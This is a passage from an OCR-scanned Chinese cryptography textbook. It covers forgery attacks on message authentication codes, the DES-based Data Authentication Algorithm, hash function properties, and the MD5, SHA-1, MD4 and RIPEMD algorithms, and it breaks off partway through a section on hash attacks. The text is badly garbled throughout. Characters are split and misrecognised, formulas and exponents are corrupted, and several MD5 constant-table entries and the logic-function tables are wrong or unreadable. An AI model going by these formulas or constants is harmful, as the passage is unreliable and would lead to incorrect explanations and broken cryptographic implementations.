( 约 2 所" 个 ) ,计算 出 来 的 MAC 都 等 于 MAC,。 这 些 密 钥 中 哪 一 个 是 正确 的 密 钥 不 得 而 知 。 
这 时 需要 新 的 M-MAC 对 来 测试 这 2:“" 个 密 钥 ,于 是 有 如 下 的 重复 攻击 : 

(1) 给 定 M 和 MAC 一 Ch (M1), 对 所 有 2* 个 密 钥 ,判断 MAC; 一 Ci (M ) ,匹配 数 约 
p> 

(2) 给 定 Ms 和 MAC*: 一 Cu (M) ,对 所 有 2 二 "个 密 钥 ,判断 MAC; 一 Cu (M;) ,匹配 数 约 
为 Fi 

平均 来 讲 , 若 一 zX7, 则 需 工 次 循环 才能 找到 正确 的 密 钥 。 所 以 ,用 穷 举 法 攻破 MAC 
比 攻破 加 密 算 法 要 困难 得 多 。 

如 果 密 钥 长 度 小 于 或 等 于 MAC 的 长 度 , 则 很 可 能 在 (1) 中 就 得 到 一 个 密 钥 。 


2. 攻击 算法 


有 时 候 攻 击 者 可 以 利用 消息 认证 函数 的 缺陷 来 实现 成 功 的 攻击 。 

分 析 下 面 的 消息 认证 算法 : 

消息 M= (Xi | Xs 上 … | X,) 是 由 64 比特 长 的 分 组 Xi (i 二 1,…,m) 链 接 而 成 ,MAC 
算法 是 

AM=XDX DDX, 
Cx (M) = ErLA(M)] 

加 密 算法 已 是 DES。 因 此 , 密 钥 长 度 为 56 比特 。 如 果 敌 手 得 到 M | Cx CM) ,那么 敌手 
使 用 穷 举 搜索 攻击 寻找 K 将 需 做 至 少 2*” 次 运算 ,这 是 非常 困难 的 。 但 攻击 者 可 以 改变 M 
的 内 容 , 却 得 到 正确 的 MAC 值 ,方法 如 下 : 

用 Yi 替换 Xi ,Ys 替换 Xs ,…,Yw 替换 Xu, 其 中 Yi,Ys,…,Yw 是 攻击 者 编造 的 假 消 
息 。 且 YY 二 YY,B…@Y,-1:DA(M)。 

攻击 者 按 上 述 方法 将 消息 算 改 之 后 发 送 给 接收 者 。 

当 接 收 者 收 到 这 个 消息 : M = 一 (” | Y: | … YY ) ,他 采用 相同 的 方法 来 计算 MAC 
值 ,并 于 收 到 的 MAC 值 相 对 照 

A(M’) = YY, OB:…BY,= AM) 

所 以 ,Ck (CM) 二 Ck (M ) ,通过 了 验证 ,攻击 得 逮 。 

因此 ,为 了 避免 消息 认证 码 受 到 上 面 的 攻击 方式 ,消息 认证 码 必须 满足 下 列 基本 要 求 : 

(1) 车 攻击 者 已 知 M 和 Cx (CM), 则 他 构造 M' 并 使 其 满足 Cx (M) 二 Cx (M ) 在 计算 上 
不 可 行 。 

(2) Ck (MD) 应 是 均匀 分 布 的 , 即 对 于 随机 消息 M 和 M“ ,Cx (M) 一 Ck (M') 的 概率 是 
2 ,其 中 站 是 MAC 的 位 数 。 

(3) 若 M' 是 M 的 某 个 变换 , 即 M 一 fA(M), 例 如 了 为 插入 一 个 或 多 个 比特 ,那么 
Pr[Ck(CM) 一 Ck CM')] 一 2 一 。 

第 一 个 要 求 是 针对 上 例 中 的 攻击 类 型 的 ,此 要 求 是 说 敌手 不 需要 找 出 密 钥 K 而 伪造 一 
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个 与 截获 的 MAC 相 匹 配 的 新 消息 在 计算 上 是 不 可 行 的 。 第 二 个 要 求 是 说 敌手 如 果 截 获 一 
个 MAC, 则 伪造 一 个 相 匹配 的 消息 的 概率 为 最 小 。 最 后 一 个 要 求 是 说 函数 C 不 应 在 消息 
的 某 个 部 分 或 某 些 比特 弱 于 其 他 部 分 或 其 他 比特 ,否则 敌手 获得 M 和 MAC 后 就 有 可 能 修 
改 M 中 弱 的 部 分 ,从 而 伪造 出 一 个 与 原 MAC 相 匹 配 的 新 消息 。 


533 基于 DES 的 消息 认证 码 


数据 认证 算法 是 一 个 最 为 广泛 使 用 的 消息 认证 码 ,已 作为 FIPS Publication(FIPS PUB 
113) ,并 被 ANSI 作为 X9. 17 标准 。 

算法 基于 密 文 块 链接 (CBC) 模 式 的 DES 算法 ,其 初始 向 量 取 为 零 向 量 。 计 算数 据 认 证 
码 DAC 的 过 程 如 下 : 

将 需 被 认证 的 数据 (消息 记录、 文件 或 程序 ) 分 为 64 比特 长 的 分 组 Di ,D: ,…,Dx ,其 
中 最 后 一 个 分 组 不 够 64 比特 的 话 , 可 在 其 右边 填充 一 些 0, 然 后 按 以 下 过 程 ,利用 DES 加 密 
算法 EF 和 密 钥 K 计算 数据 认证 码 DAC( 如 图 5-9 所 示 ) 。 
其 中 : 


O01 = Ex(D) 
O; = Ex(D;, ©® O01) 
O; = Ex(D; ©® 0,) 


Oy = Ex (Dn ® ON) 
数据 认证 码 可 以 取 整 个 Ov 块 ,或 者 取 为 On 的 最 左 M 个 比特 ,其 中 16 寺 M64。 


第 ! 次 第 2 次 第 N 次 
Di 
(64 比 特 ) a 
-© we ie 
1 
Ke DES 大 | DES 天 | 
(56 比 特 ) 加 密 加 密 
1 1 
Oi 
(64 比 特 ) % 
图 5-9 数据 认证 算法 
54 ”Hash 函数 
54.1 基本 概念 


散 列 (Hash) 函数, 又 称 为 哈 希 函数 或 杂凑 函数 ,是 对 不 定 长 的 输入 产生 定 长 输出 的 一 
种 特殊 函数 ,可 以 表达 为 /一 囊 CM) ,这 里 的 M 为 消息 ,其 长 度 不 定 ,h 被 称 为 散 列 值 .Hash 
值 . 散 列 码 或 哈 希 值 ,长 度 一 定 , 一 般 为 128 位 或 160 位 ,如 图 5-10 所 示 。 
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HO 散 列 值 n， 一 般 为 
消息 M 128 或 160 位 


不 定 长 


图 5-10 ” 哈 希 函数 


假定 两 次 输入 同样 的 数据 ,那么 散 列 函数 应 该 能 够 生成 相同 的 散 列 值 。 输 入 数据 中 的 
一 位 发 生 了 变化 ,会 导致 生成 的 散 列 值 完 全 不 一 样 。 

散 列 函 数 有 个 非常 重要 的 特性 为 单 向 性 ,也 就 是 从 M 计算 h 容易 ,而 从 hh 计算 M 不 可 
能 。 似 乎 有 点 类 似 于 非 对 称 加 密 算法 ,但 其 根本 区 别 就 在 于 散 列 函 数 是 没有 密 钥 的 。 因 为 
它 根本 不 需要 从 hh 推导 出 M。 

用 户 A 和 B 通信, 为 了 保证 信息 在 传送 过 程 中 没有 被 修改 , 则 A 把 自己 的 消息 通过 散 
列 函 数 生成 Hash 值 , 附 着 在 消息 后 ,接收 方 收 到 消息 后 ,重新 计算 Hash 值 ,如果 相同 , 则 表 
示 在 传送 过 程 中 消息 未 被 算 改 ,反之 则 表明 消息 被 自 改 ,如 图 5-11 所 示 。 


用 户 A [x | 用 户 B 
h 
消息 M 消息 M 重新 计算 / 
jw | 
散 列 值 有 散 列 值 af | 
比较 是 否 相同 


图 5-11 散 列 函数 的 用 法 


实际 上 ,由 于 散 列 函数 没有 密 钥 , 并 且 本 身 属于 公开 函数 ,如 果 恶 意 第 三 方 在 修改 明文 
M 的 同时 ,重新 计算 了 散 列 值 , 则 接收 方 无 法 发 现 消息 被 修改 过 ,无 法 达到 认证 的 效果 。 所 
以 在 实际 使 用 过 程 中 ,发 送 方 会 用 某 种 加 密 方法 对 Hash 值 进 行 加 密 , 然 后 附着 在 消息 后 进 
行 传递 。 接 收 方 首先 计算 Hash 值 , 然 后 把 附加 在 消息 后 的 Hash 值 解密 ,两 者 相同 则 表示 
认证 成 功 。 

由 于 Hash 值 位 数 很 少 ,一 般 只 有 128 或 者 160 位 ,所 以 加 密 和 解密 不 会 为 通信 系统 带 
来 太 大 负担 。 

散 列 函数 的 目的 是 为 文件 ,消息 或 者 其 他 的 分 组 数据 产生 “指纹 ”, 为 了 防止 第 三 方 伪造 
Hash 值 或 者 通过 Hash 值 计算 出 明文 , 散 列 函数 瓦 必须 满足 以 下 几 个 性 质 : 

(1) 互 对 于 任何 大 小 的 数据 分 组 ,都 能 产生 定 长 的 输出 。 要 求 散 列 函数 能 够 适合 于 各 
种 消息 和 文件 ,用 途 广 泛 。 

(2) 对 于 任何 给 定 的 M,H(CM) 要 相对 易于 计算 。 保 证 了 散 列 函数 不 会 给 系统 增加 太 
多 负担 。 

(3) 对 于 任何 给 定 的 Hash 值 ,计算 出 M 在 计算 上 不 可 行 。 防 止 第 三 方 通过 散 列 值 
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计算 出 明文 M, 也 就 是 单 向 性 , 即 构造 相应 的 MH-1(h) 不 可 行 。 这 样 , 散 列 值 就 能 在 统 
计 上 唯一 地 表征 输入 值 。 

(4) 对 任何 给 定 的 Mi ,寻找 M: ,使 昌 (M) 一 HCM,) 在 计算 上 不 可 行 。 防 止 第 三 方 伪 
造 Hash 值 ,无 法 在 不 修改 Hash 值 的 情况 下 修改 消息 而 不 被 察觉 。 这 个 称 为 抗 碰撞 性 。 

所 谓 抗 碰撞 性 (collision resistant) , 即 在 统计 上 无 法 产生 两 个 Hash 值 相同 的 预 映射 。 
给 定 M, 计 算 上 无 法 找到 M' ,满足 H(MD) 一 HCM' ) ,此 谓 弱 无 碰撞 性 。 

(5) 寻找 任何 的 (Mi ,Ms), 使 有 H(Mi) 二 有 H(M;) 在 计算 上 不 可 行 。 此 谓 强 无 碰撞 性 。 要 
求 “ 强 无 碰撞 性 ”主要 是 为 了 防范 所 谓 “ 生 日 攻击 (birthday attack)”, 有 关 生 日 攻击 ,将 在 后 
文 详细 介绍 。 

注意 ,(4) 和 (5) 的 区 别 在 于 在 (4) 中 给 定 了 M, 而 在 (5) 中 没有 这 个 限制 。 

另外 和 密码 算法 的 要 求 一 样 ,映射 分 布 均匀 性 和 差分 分 布 均匀 性 , Hash 值 中 为 0 的 比 
特 和 为 1 的 比特 ,其 总 数 应 该 大 致 相等 ; 输入 中 一 个 比特 的 变化 ,Hash 值 中 将 有 一 半 以 上 
的 比特 改变 , 即 * 雪 前 效应 ”; 要 实现 使 Hash 值 中 出 现 一 个 比特 的 变化 , 则 输入 中 至 少 有 一 
半 以 上 的 比特 必须 发 生变 化 。 其 实质 是 必须 使 输入 中 每 一 个 比特 的 信息 ,尽量 均匀 的 反映 
到 输出 的 每 一 个 比特 上 去 ; 输出 中 的 每 一 个 比特 ,都 是 输入 中 尽 可 能 多 比特 的 信息 一 起 作 
用 的 结果 。 


542 认证 方法 


Hash 值 不 同 的 使 用 方式 可 以 提供 不 同 要 求 的 消息 认证 。 下 面 列举 了 几 种 不 同 应 用 的 
认证 方法 。 

(1) 使 用 对 称 密码 体制 仅 对 附加 的 散 列 值 进行 加 密 , 仅 提供 认证 功能 (如 图 5-12 
所 示 )。 

(2) 使 用 对 称 密码 体制 对 附加 了 散 列 值 的 消息 进行 加 密 。 能 够 提供 认证 和 机 密 性 (如 
图 5-13 所 示 )。 


消息 M 消息 M 
散 列 值 h 散 列 值 h 
图 5-12 ”对称 密码 体制 下 的 认证 图 5-13 ”对 称 密码 体制 下 的 认证 和 加 密 


(3) 使 用 公 钥 密码 体制 ,但 发 送 方 的 私有 密 钥 仅 对 散 列 值 进行 加 密 。 能 够 提供 认证 和 


数字 签名 (如 图 5-14 所 示 )。 
消息 M 消息 M 
oil eK 


5-14 公 钥 密码 体制 下 的 认证 和 签名 


还 有 其 他 的 应 用 方法 ,例如 对 签名 后 的 消息 再 加 密 等 ,以 保证 消息 的 机 密 性 。 
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散 列 函数 设计 成 可 以 生成 足够 小 的 散 列 值 以 便 管理 。 例 如 MD5(RFC 1321) 和 SHA-1 
(FIPS PUB 180-1) 这 样 的 散 列 算法 是 当前 最 常用 的 算法 。 


543 常用 Hash 算 法 
目前 常用 的 Hash 算法 一 般 都 采用 迭代 型 结构 ,这 种 结构 的 Hash 函数 已 被 证 明 是 合理 


的 ,如 果 采 用 其 他 结构 ,不 一 定安 全 。 在 设计 新 的 Hash 函数 时 ,也 往往 只 是 改进 这 种 结构 ， 
或 者 增加 Hash 码 长 。 和 迭代 型 Hash 函数 的 一 般 结构 如 图 5-15 所 示 。 


n 了 n / n - n n CV 


IW=Ch ch CV 


图 5-15 Hash 算 法 的 迭代 型 结构 


其 中 ,明文 M 被 分 为 个 分 组 Y。 ,Yi ,… ,YL-1,6 为 明文 分 组 长 度 ,n 为 输出 Hash 值 的 
长 度 ,CV; 是 各 级 输出 ,最 后 一 个 输出 值 即 是 Hash 值 。 

算法 的 核心 技术 是 设计 无 碰撞 的 压缩 函数 /, 而 敌手 对 算法 的 攻击 重点 是 了 的 内 部 结 
构 , 由 于 /和 分 组 密码 一 样 是 由 若干 轮 处 理 过 程 组 成 ,所 以 对 了 的 攻击 需 通 过 对 各 轮 之 间 
的 位 模式 的 分 析 来 进行 ,分 析 过 程 常常 需要 先 找 出 三 的 碰撞 。 由 于 f 是 压缩 函数 ,其 碰撞 
是 不 可 避免 的 ,因此 在 设计 了 时 就 应 保证 找 出 其 碰撞 在 计算 上 是 不 可 行 的 。 

下 面 介绍 的 几 种 Hash 算法 都 采用 了 这 种 迭代 型 结构 。 


1. MD5 算法 


MD5 的 全 称 是 Message-digest Algorithm 5( 消 息 -摘要 算法 ) ,在 20 世纪 90 年 代 初 由 
MIT Laboratory for Computer Science 和 RSA Data Security Inc 的 Ronald L，Rivest 开发 
出 来 ,经 MD2、MD3 和 MD4 发 展 而 来 。 

利用 MD5 Hash 算法 来 产生 消息 摘要 时 ,输入 的 消息 可 任意 长 ,对 输入 按 512 位 的 分 
组 为 单位 进行 处 理 , 处 理 后 输出 为 128 比特 的 Hash 值 , 其 处 理 过 程 如 图 5-16 所 示 。 

该 处 理 过 程 包含 了 如 下 几 个 步骤 : 

1) 消息 填充 

首先 填充 消息 ,使 其 长 度 比 512 的 整数 倍 少 64 位 。 注 意 ,即使 消息 本 身 已 经 满足 上 述 
长 度 要 求 , 仍 然 需要 进行 填充 。 比 如 , 若 消息 长 度 为 448 位 , 则 仍 需 填 充 512 位 使 其 长 度 为 
960 位 。 填 充 的 内 容 由 一 个 1 和 后 续 的 0 组 成 。 然 后 ,在 填充 内 容 的 后 面 再 附 上 64 位 ,这 
64 位 存放 的 内 容 是 填充 前 消息 的 长 度 。 如 果 消 息 长 度 大 于 2”, 则 取 其 对 2 的 模 。 

执行 这 一 步骤 后 ,消息 的 长 度 为 512 的 倍数 ( 设 为 工 倍 ), 则 可 将 消息 表示 为 分 组 长 为 
512 的 一 系列 分 组 Yo ,Yi ,… ,YL-1, 而 每 一 分 组 又 可 表示 为 16 个 32 比特 长 的 字 , 这 样 消息 
中 的 总 字数 为 N 二 LX16, 因 此 消息 又 可 按 字 表示 为 ML0,…,N 一 1], 如 图 5-17 所 示 。 
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填充 (1 一 512 bit) ”消息 长 度 (K mod 254) 
OOOO L512 bit=Nx32 bit 一 


Kbit ee 


LE 
县 


一 -512 bit 一 一 一 一 512 bit 一 一 一 一 512 bit 一 一 一 一 512 bit 一 一 


图 5-16 利用 MD5 Hash 产生 消息 摘要 


消息 长 度 
消息 100…0 | 64bit 
Kbit | 
Lx512 bit 
图 5-17 消息 填充 


2) 缓冲 区 初始 化 
Hash 函数 的 中 间 结 果 和 最 终结 果 保 存 于 128 位 的 缓冲 区 中 ,缓冲 区 用 32 位 的 寄存 器 
表示 。 可 用 4 个 32 比特 长 的 字 表示 : A、B、C、.D。 初 始 存 数 以 十 六 进 制 表示 为 
A=01234567 
B=89ABCDEF 
C=FEDCBA98 
D=76543210 
3) 于 wns 运算 
以 分 组 为 单位 对 消息 进行 处 理 , 每 一 分 组 Y,(g 一 0,… ,LL 一 1) 都 经 过 压缩 函数 及 wos 处 
理 。Hwos 是 算法 的 核心 ,其 中 又 有 4 轮 处 理 过 程 。Hwo; 的 4 轮 处 理 过 程 结构 一 样 ,但 所 用 
的 逻辑 函数 不 同 , 分 别 表示 为 F.G、H、T。 每 轮 的 输入 为 当前 处 理 的 消息 分 组 Y。 和 缓冲 区 
的 当前 值 A、.B、C、D, 输 出 仍 放 在 缓冲 区 中 以 产生 新 的 A、B、C、D。 每 轮 又 要 进行 16 步 迭 代 
运算 ,4 轮 共 需 64 步 完 成 。 第 四 轮 的 输出 与 第 一 轮 的 输入 相 加 得 到 最 后 的 输出 ,如 图 5-18 
所 示 。 
这 里 64 步 处 理 基本 结构 相同 ,只 不 过 每 一 轮 用 到 逻辑 函数 各 不 相同 ,同时 每 一 步 的 输 
入 参数 也 有 所 不 同 。 一 步 迁 代 的 过 程 如 图 5-19 所 示 。 
其 中 函数 g(b,c,d) 为 逻辑 函数 。4 轮 运算 中 使 用 的 逻辑 函数 如 表 5-1 所 示 。 
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图 5-18 一 个 分 组 的 Ho 处理 
A B C D 
XIA 
TH] 一 一 
A B Cc D 
图 5-19 一 步 迭 代 
表 5-1 逻辑 函数 
轮 基本 函数 g &g(CDcyd) 
i Flb,c,d) (GAOV Gb Ma) 
2 Glbscsd) (GADV cAd-) 
3 五 (bc,d) 29c@d 
4 IC(b,c,d) cBoV ad- 
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其 中 ,bc、d 分 别 表示 寄存 器 B.C、D 中 的 内 容 。 运 算 和 人 、V 、 四 分 别 表 示 逮 辑 操作 AND、 
OR NOT XOR 。 
X[A] 为 当前 分 组 的 第 & 个 32 位 字 。 每 一 步 使 用 的 XLA] 如 表 5-2 所 示 。 


表 5-2 512 位 分 组 中 X[k] 的 使 用 顺序 


第 1 轮 X[0] X[1] X[2] X[3] X[4] X[5] X[6] X[7] X[8] X[9] X[10] X[11] X[12] X[13] X[14] X[15] 
第 2 轮 X[1] X[6] X[11] X[o] X[5] X[10] X[15] X[4] X[9] X[14] X[3] X[8] X[13] X[2] X[7] X[12] 
第 3 轮 X[5] X[8] X[11] X[14] X[1] X[4] X[7] X[10] X[13] X[0] X[3] XL6] X[9] X[12] X[15] X[2] 
第 4 轮 X[0] X[7] X[14] X[5] X[12] X[3] X[10] X[1] X[8] X[15] X[6] X[13] X[4] X[11] X[2] X[9] 


图 5-19 中 的 T[ 门 为 2*”Xabs(Sin(i)) 的 整数 部 分 ,i 是 弧度 。T[1,…,64] 为 64 个 元 素 
表 , 分 四 组 参与 不 同 轮 的 计算 , 它 参 与 运算 的 作用 是 消除 输入 数据 的 规律 性 。 表 5-3 列 出 了 
开 的 所 有 值 。 


表 5-3 ”从 正弦 函数 构造 的 表 T 


T[1]= d76aa478 T[17]= f61e2562 T[33]= fffa3942 T[49]= f4292244 
T[2]= e8c7b756 T[18]= c040b340 T[34]= 8771f681 T[50]= 432aff97 
T[3]= 242070db T[19]= 265e5a51 T[35]= 6d9d6122 T[51]= ab9423a7 
T[4]= clbdceee T[20]= e9b6c7aa T[36]= fde5380c T[52]= fc93a039 
T[5]= f57cOfaf T[21]= dé62f105d T[37]= a4beea44 T[53]= 655b59c3 
T[6]= 4787c62a T[22]= 02441453 T[38]= 4bdecfa9 T[54]= 8foccc92 
T[7]= a8304613 T[23]= d8ale681 T[39]= f6bb4b60 T[55]= ffeff47d 

T[8]= fd469501 T[24]= e7d3fbc8 T[40]= bebfbc70 T[56]= 85845dd1 
T[L9]= 698098d8 T[25]= 21elcde6 T[41]= 289b7ec6 T[57]= 6fa87e4f 
T[10]= 8b44f7af T[26]= c33707d6 T[42]= eaal27fa T[58]= fe2ce6e0 

T[11]= {fff5bbl T[27]= f4d50d87 T[43]= d4ef3085 T[59]= a3014314 
T[12]= 895cd7be T[28]= 455al4ed T[L44]= 04881d05 T[60]= 4e0811al 
T[13]= 6b901122 T[29]= a9e3e905 T[45]= d9d4d039 T[61]= f7537e82 
T[14]= fd987193 T[30]= fcefa3f8 T[46]= e6db99e5 T[62]= bd3af235 
T[15]= a679438e T[L31]= 676f02d9 T[47]= lfa27cf8 T[63]= 2ad7d2bb 
T[16]= 49b40821 T[32]= 8d2a4c8a T[48]= c4ac5665 TL63]= eb86d391 


图 5-19 中 的 CLSs 为 循环 左 移 * 位 。 其 中 第 一 轮 的 1 一 4 步 分 别 循环 左 移 7、12、17、22 
位 ,剩余 12 步 则 分 别 重复 左 移 7、12、17、22 位 , 即 第 5 一 8 步 也 分 别 循环 左 移 7、12、17、22 
位 ,以 此 类 推 。 

第 二 轮 则 分 别 循环 左 移 5、9、14、20 位 ,第 三 轮 分 别 循环 左 移 4、11、16、23 位 ,第 四 轮 分 
别 循环 左 移 6、10、15、21 位 。 

通过 这 64 步 运 算 之 后 ,所 得 的 结果 与 最 初 输入 的 分 组 进行 模 2* 加 法 。 所 得 结果 成 为 
下 一 个 分 组 进行 运算 的 缓冲 区 初始 值 。 以 此 类 推 。 

4) 输出 

所 有 的 工 个 512 位 分 组 都 处 理 完 后 ,最 后 一 个 分 组 的 输出 即 为 128 位 的 消息 摘要 ,如 
图 5-15 所 示 。 
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2. SHA 算法 


SHA(Secure Hash Algorithm , 译 做 安全 散 列 算法 ) 是 美国 国家 安全 局 (NSA) 设 计 , 美 
国 国 家 标准 与 技术 研究 院 (NIST) 发布 的 一 系列 密码 散 列 函数 。 正 式 名称 为 SHA 的 家 族 
第 一 个 成 员 发 布 于 1993 年 。 然 而 现在 的 人 们 给 它 取 了 一 个 非 正式 的 名 称 SHA-0 以 避免 与 
它 的 后 继 者 混淆 。 两 年 之 后 ,SHA-1, 第 一 个 SHA 的 后 继 者 发 布 了 。 另 外 还 有 四 种 变 体 ， 
曾经 发 布 以 提升 输出 的 范围 和 变更 一 些 细微 设计 : SHA-224, SHA-256,SHA-384 和 
SHA-512( 这 些 有 时 候 也 被 称 做 SHA-2) 。 

SHA-1 基于 MD4 算法 ,并 与 之 非常 类 似 。 算 法 输入 为 小 于 2%# 比特 长 的 任意 消息 ,经 
过 填充 之 后 分 组 为 512bit 长 ,计算 出 的 Hash 值 为 160bit。 

与 MD5 处 理 消息 的 过 程 一 样 ,SHA-1 算法 也 将 消息 按 512 位 分 组 处 理 ,基本 步骤 
如 下 : 

1) 消息 填充 

填充 消息 使 其 长 度 与 448 模 512 同 余 , 即 长 度 等 于 512bit 的 整数 倍加 上 448bit。 填 充 
方法 是 在 消息 后 附加 一 个 1 和 若干 个 0。 然 后 附 上 表示 填充 前 报 文 长 度 的 64 位 数据 (最 高 
有 效 位 在 前 ) 。 

2) 缓冲 区 初始 化 

Hash 函数 的 中 间 结 果 和 最 终结 果 保 存 于 160 位 的 缓冲 区 中 ,缓冲 区 用 5 个 32 位 的 寄 
存 器 (A、B、C、D、E) 表 示 , 并 将 这 些 寄存 器 初始 化 为 下 列 32 位 的 整数 : 

A=67452301; B=EFCDAB89; C=98BADCFB; D=10325476; E 一 C3D2E1F0。 

3) Hsnai 运 算 

执行 算法 主 循环 。 每 次 循环 处 理 一 个 512 位 的 分 组 , 故 循环 次 数 为 填充 后 消息 的 分 组 
数 ,执行 过 程 如 图 5-20 所 示 。 


AS12 位 ) | 。 | MG12 位 ) [M12tin 


L_ | 
一 Fuw- 
160 位 
Tc 


图 5-20 利用 SHA-1 算法 产生 消息 摘要 


算法 的 核心 是 具有 4 轮 运算 的 模块 ,每 轮 执 行 20 步 迭 代 。 每 轮 的 输入 为 当前 处 理 的 消 
息 分 组 Y, 和 缓冲 区 的 160bit 当前 值 A.B、C、D、E, 输 出 仍 放 在 缓冲 区 中 以 产生 新 的 A、B、 
C.D。 每 轮 又 要 进行 20 步 迭 代 运 算 ,4 轮 共 需 80 步 完 成 。 第 四 轮 的 输出 与 第 一 轮 的 输入 相 
加 得 到 最 后 的 输出 。 四 轮 运算 的 结构 相同 ,但 每 轮 使 用 一 个 不 同 的 加 法 常量 天 ,, 其 中 上 表 
示 步 数 ,0<t<79, 且 各 轮 使 用 不 同 的 基本 侵 辑 函数 ,分 别 是 fi、f。、f;、f1。 各 轮 中 使 用 的 
加 法 常量 如 表 5-4 所 示 。 
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表 5-4 SHA-1 算法 中 使 用 的 加 法 常量 


步 又 十 六 进 制 
0<1<19 K,=5A827999 
20<t<39 K,=6ED9EBAl1 
40<1<59 K, =8F1BBCDC 
60<1<79 K, =CA62C1D6 


4 轮 运算 中 使 用 的 逻辑 函数 如 表 5-5 所 示 。 
表 5-5 SHA-1 算法 中 使 用 的 逻辑 函数 


轮 基本 函数 函 数 值 
fi(B,C,D) (BAO'V (B- AD) 

多 fi(B,C,D) BOCOD 

3 f,(B,C,D) (BAOV (BAD V (CAD) 
4 fi(B,C,D) BOCOD 


其 处 理 过 程 如 图 5-21 所 示 。 


QoQ 


fi,K, WIO…19] 人 


20 步 


Al BI ct pf El 


Cron 


图 5-21 一 个 分 组 的 Hsnwi 处 理 


处 理 一 个 512 位 的 分 组 要 执行 80 步 , 其 中 每 一 步 的 执行 过 程 如 图 5-22 所 示 。 

在 图 5-22 中 ,A、B、C.D\E 是 缓冲 区 的 5 个 字 ;“ 十 ”表示 模 2* 相 加 ; f, 是 第 上 步 使 用 
的 逻辑 函数 ; K, 是 第 t 步 使 用 的 加 法 常量 ; CLS; 表示 32 位 的 变量 循环 左 移 5 位 ; CLS;o 表 
示 32 位 的 变量 循环 左 移 30 位 ; W, 是 从 当前 的 512 位 输入 分 组 中 导出 的 32 位 字 。W, 的 导 
出 过 程 如 图 5-23 所 示 。 
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5-22 SHA 的 单 步 操作 


人 WW Ws Why Ws a sy Wes Wos I Wie 
Ld Es Ly 
1111 tri 1111 
(xor ) (xor ) ( xor ) 
(CLS) (CLS， 
的 | 所 琶 Ws | ms 这 豚 a 


5-23 ”W, 的 导出 过 程 


W, 的 前 16 个 值 (Wo ,Wi,… ,Wis ) 直接 取 为 输入 分 组 中 的 第 + 个 字 , 其 余 值 (Wi。， 
Wi ,Wyo) 取 为 W, 二 CLS1 (Wye Ww Ws Ws3)。 

4) 输出 

所 有 工 个 512bit 的 分 组 处 理 完 后 ,第 工 个 分 组 的 输出 就 是 160 位 的 消息 摘要 。 

SHA-1 和 MD5 相 比 ,尽管 两 者 都 是 基于 MD4 ,在 很 多 方面 表现 出 的 性 质 则 各 有 不 同 。 
在 抗 穷 举 攻击 方面 ,SHA-1 的 消息 摘要 要 比 MD5 的 消息 摘要 长 32 位 ,所 以 SHA-1 的 抗 穷 
举 攻击 的 能 力 要 比 MD5 强 很 多 。 但 由 于 SHA-1 的 执行 步 数 要 比 MD5 多 ,所 以 SHA-1 的 
执行 速度 比 MD5 要 慢 得 多 。 


3. 其 他 Hash 算法 


1) MD4 

Rivest 在 1990 年 开发 出 MD4 算法 。 与 前 面 介绍 的 MD5 一 样 ,MD4 算法 需要 填补 信 
息 以 确保 信息 的 字 节 长 度 加 上 448 后 能 被 512 整除 (信息 字 节 长 度 mod 512 二 448)。 然 
后 ,一 个 以 64 位 二 进 制 表示 的 信息 的 最 初 长 度 被 添加 进来 。 信 息 被 处 理 成 512 位 迭代 结构 
的 区 块 , 而 且 每 个 区 块 要 通过 三 个 不 同步 又 的 处 理 。Den boer 和 Bosselaers 以 及 其 他 人 很 
快 地 发 现 了 攻击 MD4 版 本 中 第 一 步 和 第 三 步 的 漏洞 。Dobbertin 向 大 家 演示 了 如 何 利 用 
一 部 普通 的 个 人 计算 机 在 几 分 钟 内 找到 MD4 完整 版 本 中 的 冲突 (这 个 冲突 实际 上 是 一 种 
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漏洞 , 它 将 导致 对 不 同 的 内 容 进 行 加 密 却 可 能 得 到 相同 的 加 密 后 结果 ) 。 毫 无 疑问 ,MD4 就 
此 被 淘汰 掉 了 。 尽 管 MD4 算法 在 安全 上 有 个 这 么 大 的 漏洞 ,但 它 对 在 其 后 才 被 开发 出 来 
的 好 几 种 信息 安全 加 密 算法 的 出 现 却 有 着 不 可 忽视 的 引导 作用 。 

和 MD5 相 比 ,MD4 算法 使 用 三 轮 运算 ,每 轮 16 步 ,MD5 则 使 用 四 轮 运算 ,每 轮 16 步 ; 
MD4 的 第 一 轮 没 有 使 用 加 法 常量 ,第 二 轮 运算 中 每 步 迭 代 使 用 的 加 法 常量 相同 ,第 三 轮 运 
算 中 每 步 迭代 使 用 的 加 法 常量 相同 ,但 不 同 于 第 二 轮 使 用 的 加 法 常量 ; MD5 的 64 步 使 用 
的 加 法 常量 T[ 门 均 不 同 ; MD4 使 用 三 个 基本 逻辑 函数 ,MD5 则 使 用 四 个 ; MD5 中 每 步 迭 
代 的 结果 都 与 前 一 步 的 结果 相 加 ,MD4 则 没有 。 

总 的 来 看 ,MD5 比 MD4 更 复杂 ,所 以 其 执行 速度 也 更 慢 ,Rivest 认为 增加 复杂 性 可 以 
增加 安全 性 。 

2) RIPEMD 算法 

顾名思义 ,RIPEMD 就 是 成 熟 MD 算法 ,是 Hans Dobbertin 等 3 人 在 MD4 .MD5 的 基 
础 上 于 1996 年 提出 来 的 。 算 法 共有 4 个 标准 : 128、160、256 和 320, 其 对 应 输出 长 度 分 别 
为 16 字 节 、20 字 节 、32 字 节 和 40 字 节 。 不 过 ,RIPEMD 的 设计 者 们 根本 就 没有 真正 设计 
256 和 320 位 这 两 种 标准 ,他 们 只 是 在 128 位 和 160 位 的 基础 上 ,修改 了 初始 参数 和 S-box 
来 达到 输出 为 256 和 320 位 的 目的 。 所 以 ,256 位 的 强度 和 128 相当 ,而 320 位 的 强度 和 
160 位 相当 。RIPEMD 建立 在 MD 的 基础 之 上 ,所 以 ,其 添加 数据 的 方式 和 MD5 完全 
一 样 。 
RIPEMD-160 的 输入 可 以 是 任意 长 的 报 文 ,输出 160 位 摘要 ,对 输入 按 512 位 分 组 ,以 
分 组 为 单位 处 理 。 算 法 的 核心 是 具有 十 轮 运算 的 模块 ,十 轮 运算 分 成 两 组 ,每 组 五 轮 ,每 轮 
16 步 迭 代 。 


544 对 Hash 函数 的 攻击 


一 般 来 说 ,对 一 个 Hash 算法 的 攻击 可 分 三 个 级 别 : 

(1) 预 映射 攻击 (Preimage Attack): 给 定 Hash 值 ,找到 其 所 对 应 的 明文 M, 使 得 
hash(M) 二 hh, 这 种 攻击 是 最 彻底 的 ,如 果 一 个 Hash 算法 被 人 找 出 预 映射 , 那 这 种 算法 是 不 
能 使 用 的 。 

(2) 次 预 映射 攻击 (Second Preimage Attack) : 给 定 明文 Mi ,找到 另 一 明文 M: (Mi 天 
